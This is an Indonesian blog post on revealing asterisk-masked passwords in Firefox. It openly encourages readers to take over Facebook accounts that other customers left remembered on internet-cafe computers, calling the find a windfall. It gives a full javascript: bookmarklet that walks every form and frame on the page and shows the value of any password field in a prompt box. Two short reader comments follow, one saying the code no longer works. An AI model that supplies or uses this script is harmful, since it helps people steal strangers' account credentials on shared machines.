Cara Melihat Kode Asterix di Firefox


Mungkin sobat pernah mengakses facebook di warnet, dan sobat menemukan ada alamat email plus kode asterix (yang berbentuk bintang) yang muncul pada kotak pengisian password. Wah! rejeki nomplok nie. Rupanya ada pengguna komputer warnet tersebut yang mengakses facebook lalu mencentang pilihan "ingatkan saya" atau "remember me" sehingga alamat email dan passwordnya dalam bentuk asterix tidak hilang saat diakses oleh pengguna lain.
Nah! alamat email sudah dapat sekarang gimana caranya untuk ngebaca isi password yang berbentuk asterix tersebut? caranya mudah bro! kita hanya perlu mengcopy pastekan kode javascript khusus untuk melihat dan membaca isi dari kode asterix tersebut dengan mempastekan kode javascript tersebut ke dalam address bar browser firefox. Mau tau kodenya?


Caranya gampang, sobat hanya perlu mengcopy kode javas
javascript bawah ini dan mempastekannya pada kotak address bar browser firefox. Inilah kode javasjavascript: untuk melihat kode asterix tersebut:
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}


Setelah sobat memasukkan kode di atas, tekan tombol "enter" dan  kode asterix pun berhasil di baca. Selamat mencoba...

2 Response to "Cara Melihat Kode Asterix di Firefox"

  1. linknya udah di pasang jg bro, dan ane dah follow juga..follw balik ya. sukses selalu buatmu

    Anonim says:

    dah ga bs pak code javascriptnya..makasih

Posting Komentar

Powered by Blogger